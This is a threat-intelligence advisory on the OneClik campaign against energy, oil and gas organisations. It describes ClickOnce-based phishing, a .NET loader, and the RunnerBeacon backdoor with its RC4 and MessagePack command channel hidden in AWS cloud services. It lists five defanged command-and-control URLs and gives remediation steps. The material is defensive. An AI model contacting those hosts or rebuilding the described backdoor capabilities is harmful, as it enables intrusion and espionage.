Analysis Summary

A newly identified advanced persistent threat (APT) campaign known as OneClik is actively targeting critical energy, oil, and gas sectors using an innovative exploitation of Microsoft ClickOnce technology. The campaign begins with highly convincing phishing attacks that lure users to Azure Blob Storage-hosted websites masquerading as “hardware analysis” portals. These sites deploy malicious ClickOnce manifests, initiating an infection chain that stealthily delivers malware under the guise of legitimate software. This use of trusted cloud services allows threat actors to bypass traditional security solutions and execute the initial payload.

According to the Researcher, OneClik’s infection process unfolds through three sophisticated variants, v1a, BPI-MDM, and v1d, each showcasing progressive enhancements in stealth, evasion, and control capabilities. At its core, the malware employs a two-stage payload system featuring a .NET loader called OneClikNet and a Go-based backdoor known as RunnerBeacon. The loader uses modular configuration logic to adapt dynamically to each target environment, while the backdoor communicates persistently with command-and-control (C2) servers via encrypted RC4 channels and MessagePack-encoded messages. This dynamic framework enables attackers to maintain long-term access with minimal detection. These communications are conducted through legitimate cloud infrastructure, specifically AWS services such as CloudFront, API Gateway, and Lambda, including the following C2 domains:

• hxxps://dyydej4wei7fq.cloudfront[.]net
• hxxps://b2zei88b61.execute-api.eu-west-2.amazonaws[.]com
• hxxps://d1ismqgtp337lz.cloudfront[.]net
• hxxps://dzxwmpi8xepml.cloudfront[.]net
• hxxps://7dqtdjxfycaqhjvc2qmx5js4aq0juygw.lambda-url.us-east-1.on[.]aws

What sets OneClik apart is its use of legitimate cloud infrastructure for C2 communications. Services such as AWS CloudFront, API Gateway, and Lambda functions are misused to disguise malicious activity within routine network traffic. This novel approach makes traditional detection methods ineffective without deep behavioral analysis or packet inspection, as the malware traffic blends seamlessly into standard cloud operations. Furthermore, each malware variant demonstrates increasing anti-analysis measures, culminating in memory-based sandbox detection and domain verification in later versions, emphasizing the actor’s continuous R&D efforts.

The RunnerBeacon backdoor represents a leap forward in malware design, leveraging a 16-type message protocol to perform a wide range of actions from basic beacons and file transfers to SOCKS5 proxy setup, port scanning, shell execution, and privilege escalation. It supports interactive command execution via isolated process environments with redirected input/output, shellcode injection, token manipulation, and task control functions. With its structured architecture and encrypted communications, RunnerBeacon offers remote access features rivaling commercial tools, highlighting the advanced capabilities and intent behind the campaign to conduct long-term, covert cyber-espionage operations against strategic infrastructure.

Impact

• Sensitive Data Theft
• Gain Access
• Security Bypass

Remediation

• Disable ClickOnce execution for non-approved applications through Group Policy or endpoint management tools to prevent unauthorized installations.
• Deploy advanced network monitoring and anomaly detection tools capable of inspecting traffic to and from Azure Blob, AWS CloudFront, API Gateway, and Lambda endpoints.
• Employ deep packet inspection (DPI) firewalls or network appliances to detect encrypted RC4 and MessagePack traffic patterns used by the RunnerBeacon backdoor.
• Filter emails for suspicious links and attachments, especially those referring to “hardware analysis” tools or domains hosted on Azure Blob Storage.
• Use application control policies to allow only trusted software to run, blocking unknown or unsigned .NET or Go-based binaries.
• Ensure operating systems and endpoint software are regularly updated to reduce exposure to privilege escalation or remote code execution vulnerabilities.
• Educate employees about phishing tactics, especially those using cloud-hosted links or impersonating diagnostic tools.
• Isolate OT (Operational Technology) and ICS (Industrial Control Systems) from internet-facing systems to reduce lateral movement potential.
• Utilize modern endpoint and extended detection and response tools (EDR/XDR) with behavior analysis to detect post-exploitation activity such as shell injection or token abuse.
• Continuously scan for known indicators of compromise (IOCs), process injection, and unusual shell activity related to OneClikNet and RunnerBeacon.
• Apply the principle of least privilege to all user and service accounts to restrict attackers’ ability to escalate privileges or perform lateral movement.
• Regularly review cloud service configurations and access logs to detect abuse of resources for malicious purposes.